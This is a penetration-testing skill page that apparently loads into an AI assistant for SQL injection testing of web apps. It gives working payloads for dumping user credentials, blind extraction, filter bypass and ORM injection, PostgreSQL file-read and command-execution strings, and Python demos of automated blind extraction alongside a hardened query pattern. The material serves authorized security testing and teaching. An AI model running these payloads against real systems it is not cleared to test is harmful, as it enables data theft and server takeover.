From vuln-skills
Guides SQL injection penetration testing in web apps with payloads for union-based, blind, error-based, time-based attacks, ORM injections in Django/Rails/SQLAlchemy, bypasses, and checklists.
How this skill is triggered — by the user, by Claude, or both
Slash command
/vuln-skills:pentest-sqli
The summary Claude sees in its skill listing — used to decide when to auto-load this skill
Load this Skill when performing SQL injection penetration testing against a web application. It covers classic SQLi, blind injection, ORM injection and related attack techniques.
High-risk endpoint characteristics:
- Query parameters such as ?search=, ?filter=, ?sort=, ?order=
- Path parameters such as /user/123, /item/abc
Detection signals:
- Database error text in the response, e.g. MySQL "You have an error in your SQL syntax" or PostgreSQL "ERROR: syntax error at or near"
- Abnormal response after appending ' (500 error, blank page, changed content)
- Arithmetic equivalence: id=2-1 returns the same result as id=1
Manual testing method:
- Inject ', ", ') and observe differences in the response
- Compare the responses to ' AND '1'='1 and ' AND '1'='2
- Send ' UNION SELECT NULL,NULL-- and add NULL columns one at a time to determine the column count
- Time delay: '; WAITFOR DELAY '0:0:5'-- (MSSQL) or ' AND SLEEP(5)-- (MySQL)
Payload construction:
# Union-based (determine the column count first)
' ORDER BY 1--
' ORDER BY 2--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password,NULL FROM users--
# Error-based (MySQL)
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--
# Time-blind (MySQL)
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
# Boolean-blind
' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
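The column-count discovery, UNION dump and boolean-blind extraction listed above, run end to end against a constructed target. This is an added example, not code from the skill page or the vuln-skills project: the in-memory SQLite database, its items/users tables and sample rows are assumptions made for the demo, the item_endpoint() function stands in for a web handler that concatenates a name parameter into its query, and SQLite's unicode()/substr() play the role of MySQL's ASCII()/SUBSTRING(). Binary-searching each code point needs about seven requests per character instead of one per candidate, which is what makes blind extraction practical.

```python
import sqlite3

# Constructed stand-in for the target's database (assumed schema and rows).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE items (id INTEGER, name TEXT, price REAL);
INSERT INTO items VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'hunter2'), (2, 'alice', 'wonderland');
""")

REQUESTS = 0  # simulated HTTP requests, to show the cost of blind extraction


def item_endpoint(name):
    """Simulated GET /item?name=<name>: the parameter is concatenated into SQL.
    Returns the matching rows, or None where a real app would answer HTTP 500."""
    global REQUESTS
    REQUESTS += 1
    sql = f"SELECT id, name, price FROM items WHERE name = '{name}'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def find_column_count(limit=20):
    """' ORDER BY n-- : the first n that errors is one past the column count."""
    for n in range(1, limit + 1):
        if item_endpoint(f"' ORDER BY {n}--") is None:
            return n - 1
    return None


def union_dump(columns):
    """' UNION SELECT username,password,NULL,... FROM users-- padded to the width found."""
    select_list = ",".join(["username", "password"] + ["NULL"] * (columns - 2))
    return item_endpoint(f"' UNION SELECT {select_list} FROM users--")


def oracle(condition):
    """Boolean-blind oracle: the item page renders only when the injected condition holds."""
    return bool(item_endpoint(f"widget' AND ({condition})--"))


def blind_int(expr, lo, hi):
    """Binary-search the integer value of a scalar SQL expression in [lo, hi]
    using only true/false responses."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(column, table, where):
    """Extract a string one character at a time: first its length, then each
    code point (printable ASCII range) by binary search."""
    length = blind_int(f"SELECT length({column}) FROM {table} WHERE {where}", 0, 64)
    out = ""
    for i in range(1, length + 1):
        code = blind_int(
            f"SELECT unicode(substr({column},{i},1)) FROM {table} WHERE {where}", 32, 126
        )
        out += chr(code)
    return out


if __name__ == "__main__":
    cols = find_column_count()
    print("columns:", cols)
    print("union dump:", union_dump(cols))
    print("blind:", blind_extract("username", "users", "id=1"), "after", REQUESTS, "requests")
```

Against a real target replace item_endpoint() with an HTTP request and choose the oracle signal (content difference, status code, or response time for the time-based variants) per the detection signals above.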
Bypass techniques:
- Keyword obfuscation: /*!50000UNION*/, uNiOn SeLeCt, inline comments /**/
- Encoding: double URL encoding (%2527), Unicode encoding
- Whitespace substitutes: /**/, %09, %0a, +
- Keyword splitting: SEL/**/ECT, UN/**/ION
Second-order SQLi:
- Input that is stored safely in one request (for example a registered username such as admin'--) and executed later when another query concatenates it
ORM-specific injection:
- Django: _connector injection, i.e. injecting arbitrary SQL by manipulating the connector of Q objects; FilteredRelation, i.e. testing for injection points in condition construction
- SQLAlchemy: text() concatenation; check whether raw SQL fragments contain user input
- Rails (ActiveRecord): .where("name = '#{params[:name]}'") and .order(params[:sort]) left unparameterized
- Hibernate/JPA: createQuery("FROM User WHERE name = '" + input + "'") string concatenation
- Sequelize .literal() and $raw queries with unescaped input
PostgreSQL-specific payloads:
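The Rails .where/.order pattern above, rebuilt as an added example (not code from the page or from any of the ORMs named) in Python over an in-memory SQLite database with an assumed users table: the vulnerable version interpolates both the search value and the sort key, the hardened version binds the value and allow-lists the identifier. It also shows why an unparameterized sort parameter is a boolean oracle by itself, even when the WHERE value is not injectable.

```python
import sqlite3

# Constructed stand-in for an ORM-backed app (assumed schema and rows).
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE users (id INTEGER, username TEXT, password TEXT, is_admin INTEGER);
INSERT INTO users VALUES (1, 'admin', 'hunter2', 1),
                         (2, 'alice', 'wonderland', 0),
                         (3, 'bob', 'builder', 0);
""")

# Allow-list mapping user-facing sort keys to real column names.
ALLOWED_SORT = {"name": "username", "id": "id"}


def vulnerable_list(search, sort):
    """Mirrors .where("username = '#{params[:search]}'").order(params[:sort]):
    both the value and the sort key are interpolated into the SQL text."""
    sql = f"SELECT username FROM users WHERE username = '{search}' ORDER BY {sort}"
    return [row[0] for row in db.execute(sql)]


def hardened_list(search, sort):
    """Bind the value; allow-list the identifier, because ORDER BY column
    names cannot be passed as bound parameters."""
    column = ALLOWED_SORT.get(sort)
    if column is None:
        raise ValueError(f"unsupported sort key: {sort!r}")
    sql = f"SELECT username FROM users WHERE username = ? ORDER BY {column}"
    return [row[0] for row in db.execute(sql, (search,))]


def order_oracle(condition):
    """Boolean oracle through the sort parameter alone: rows come back in
    ascending id order when the condition holds and descending otherwise,
    so the first username reveals the truth value without any error or delay."""
    sort = f"CASE WHEN ({condition}) THEN id ELSE -id END"
    rows = vulnerable_list("x' OR '1'='1", sort)
    return rows[0] == "admin"


if __name__ == "__main__":
    print("vulnerable:", vulnerable_list("x' OR '1'='1", "id"))   # every user
    print("hardened:  ", hardened_list("x' OR '1'='1", "name"))   # nothing matches
    print("admin password starts with 'h':",
          order_oracle("(SELECT password FROM users WHERE id=1) LIKE 'h%'"))
```

Binding covers values only; column names, table names and LIMIT/OFFSET fragments have to be allow-listed, which is why ?sort= and ?order= parameters stay injectable in applications that otherwise bind their WHERE values correctly.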
# Error-based
' AND 1=CAST((SELECT version()) AS int)--
# Time-blind (stacked query)
'; SELECT pg_sleep(5)--
# Time-blind in an AND context: pg_sleep() returns void, so it cannot be an operand of AND directly; wrap it in a subquery that yields a comparable value
' AND 1=(SELECT 1 FROM (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END) AS t)--
# File read (requires superuser or the pg_read_server_files role)
' UNION SELECT pg_read_file('/etc/passwd',0,1000)--
# Command execution (requires superuser; the target table must exist first, e.g. CREATE TABLE cmd_exec(cmd_output text), and the output is read back with SELECT * FROM cmd_exec)
'; COPY cmd_exec FROM PROGRAM 'id';--
Testing checklist:
- Append ' to every parameter and observe response changes (error messages, status code, content differences)
- Boolean test: AND 1=1 vs AND 1=2
- Check path parameters (e.g. /api/items/1') for injection
- Time-based test: SLEEP(5) / pg_sleep(5) / WAITFOR DELAY
- Check whether file read (LOAD_FILE) or file write (INTO OUTFILE) is possible
Impact achievable by exploitation:
- Authentication bypass with ' OR '1'='1
- Command execution or file system access (xp_cmdshell, LOAD_FILE/INTO OUTFILE)
Severity assessment:
The following cases come from publicly disclosed HackerOne vulnerability reports and show how this class of vulnerability appears on real targets.
_connector in Q Objects
A SQL injection vulnerability was discovered in the customerId parameter of the URL path. The vulnerability was demonstrated by adding a quote in the customer...
███████ via theme_name
npx claudepluginhub yhy0/ghsa-skill-builder --plugin vuln-skills